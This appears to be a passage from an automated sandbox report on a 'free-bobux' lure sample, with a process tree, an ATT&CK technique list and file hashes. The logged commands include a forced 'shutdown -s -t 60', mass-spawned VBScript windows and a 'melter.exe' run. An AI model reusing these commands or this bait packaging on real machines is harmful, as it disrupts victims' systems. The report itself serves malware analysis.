C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3152 /prefetch:15⤵PID:9268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3216 /prefetch:15⤵PID:9276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4528 /prefetch:15⤵PID:9828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4508,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4712 /prefetch:85⤵PID:10040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4380,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4420 /prefetch:85⤵
- Modifies registry class
PID:7616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5272,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5284 /prefetch:85⤵PID:10036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5288,i,11751579448551510369,17601482033703199078,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5372 /prefetch:85⤵PID:11964
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
PID:9108
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\shutdown.vbs"3⤵
- Checks computer location settings
PID:9244 -
C:\Windows\System32\shutdown.exe"C:\Windows\System32\shutdown.exe" -s -t 604⤵PID:9676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.cmd3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4204 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9896
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9944
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10004
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10148
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10212
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9108
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7684
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9680
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10120
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10256
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10320
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10332
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10360
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10424
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10528
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10620
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10660
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10728
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10748
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10784
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10860
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10900
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10944
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10968
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11016
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11140
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11168
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11212
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11244
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10492
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10588
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9588
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11048
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11056
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3784
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9520
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11332
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11352
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11416
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11472
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11528
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11568
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11588
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11616
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11680
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11764
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11788
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11876
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12008
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12048
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12096
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12180
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12256
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7616
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:4036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3828
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5468
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3664
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3532
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3728
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:2012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3652
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12332
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12448
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12468
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12492
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12532
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12552
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12588
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12644
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12672
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12736
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12756
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12792
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12868
-
-
-
C:\Windows\system32\timeout.exetimeout /t 20 /nobreak3⤵
- Delays execution with timeout.exe
PID:9440
-
-
C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exemelter.exe3⤵PID:13120
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x52c 0x4701⤵PID:4084
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:9404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:12292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:12348
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3fe9855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:11240
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:932
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
1File Deletion
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5b58f284d3748b700652084f67a798219
SHA1a0aa52f7edaacf7a4302c0d419a941c2ff1aef7b
SHA256f6d7e6dba42f9fecdb95d68f80446f51dcb9273004408b82646829b4ff0497fb
SHA51292add9fe3976535c3d9f94b9317edaf3c553048b2986d12ff7dd15da65f3434241ed719f2930bbdd457e1aab0e24d460528db05dd6750ad3d259f084d267c3af
-
Filesize
552B
MD5ffcd30c4ec9aa46dd6783f816f16b1f7
SHA15fa8126714cc82c262d1061cbb540f83bbd08372
SHA2560f6f76d6d0bf7fe5df2cb0aceb2cd047c26289124471200531c4ffe3e19f5318
SHA5120a7d8fc1990da06faa2fa6a2f997785043d61d82e3d94a97f21b843c62e7fbe6773871cbbd73ad751c96b33280806884b22fdf07a4f6d25d254539313097b359
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe62d898.TMP
Filesize96B
MD51070cfebe5c995da43a80661f2b97569
SHA16de0718f523547328a22786665df87d299a0920d
SHA2563fe3a6f8278f95a0d171e3de0b16bd55cea0a751f9fce36318aa622fbaca211b
SHA5127adc407f986d04c00de694be00c33a6d7c3b0d112cef5e4698307d4c06d4b5e495ebb2cb71ce72363b9b572fe8b1fea2ffa981fad1b7769d1f1e7e0db2e4c7a2
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
859B
MD5886f8d0d73e9c8f68e6cfee945e79546
SHA1084e6960c191a2222ee45fea9cc5a8dadb4808e1
SHA256cba618ed3c31d7c293feede400eae51cbdc61ecb8536dbcc74934b26c23080ad
SHA512003916bd8e10964928aad1ac201822acb86b2ac72186dbd6309207bfa46709353fd9292e9e932fe4b26c534c7b0b96fc384af1e837a87efc9b75801d26d73fd2
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
10KB
MD52cc2b7d5e4f2a6c9a2c2ca0d84f96547
SHA1e7ac8307966b1991c30b180dd2945462fbe2cc29
SHA2563bea4e10c5ff37c1d4879cb96432c61f734fbdfffa3de8959a2b77f7d156c524
SHA5124e8ae83e40a0722021f447a04ae67f4515afd78bdc02c2782a42c0dbfb5b177610b7ac9a977a7d36e346d52b43c7502d02fa6b508d4d7118d08aa909316df9c0
-
Filesize
9KB
MD592d1f6dc361869597a4283c7189badfa
SHA1779e3e7f09f0d0bdf270c4aaa6db27ddc46ad322
SHA2565231ca65aedb006b8cf1070a10ec4dc5340369f301dd22b42451af372627ec1c
SHA512843dfe7085b69292ed98b82d999089edfd8a1c8a02ba1ac98f44bcf8c50821acd8139c509aa91476b2b2c080d1715e9587c89da2c941ee13124e50ccce539454
-
Filesize
10KB
MD5eb5abb6cd270346d37ea070c985ddda3
SHA1beda0e48670f9a072556243c37df9c0e876a0ce9
SHA256ec9d3b88c30d600f6812bcc88f92bb5d337e809b29d9226908d31838932d2810
SHA512086f235963f1d8427da7e8abd6ab933f049f8f90a9f54fa90b255b8bd35913fbee23b2aef231c558f1c26e9a8946dab1f800abe790ed56da6632a95e1cca8004
-
Filesize
9KB
MD52b06796cdad6e86aa0bec5589c9c7841
SHA1d279e495e38264f1911f4ae829517a95d834b563
SHA25670430fe65a4a86d1482da0c01bf5885e2e4fb98347dc04c5156873180f2227ce
SHA51235f8a7d1cbeacbbfb9f4fbae53141e647ba6714cb3cff83656e622bd4436a9b6b6f43179da796f2b4ff2ba520d81f659443fcb034aa2d25fe2ffaced0f8715b5
-
Filesize
10KB
MD5ce253e73c81a59c0a8fab3d2f243d60f
SHA132d2234f33463c0a5a0023d81fc67ca9dd3d2649
SHA25635339f53a57bd2821cb82a66e96f144e3b332030b34d5e1a6fcc7db3b726cc65
SHA512ee751e48dbbc079684b2606e97027f94c6cecf4fc1c08505b94a4d4e9267a5a5a94aad7aa40fc579e133b6ad93e5e5d3bebe503a4ebebf163ebbae6241cae6dd
-
Filesize
15KB
MD53b4ee360fbe2cb762bde4908f8b36817
SHA157c3485e66670a032e979e3a490c0ccb8d505696
SHA256c7ab85f774ef2f7f9fd5cd2c91bc97212e1c8c66b13e004f153c67eab3e3ef30
SHA512ea5af33047a34f0ff193f2d4794856b3d0c11d593d561813bffce05d08b8a69d9c0412da0ac730b687134985d9500d05c746d24c5e726303d20c082bc5ac4592
-
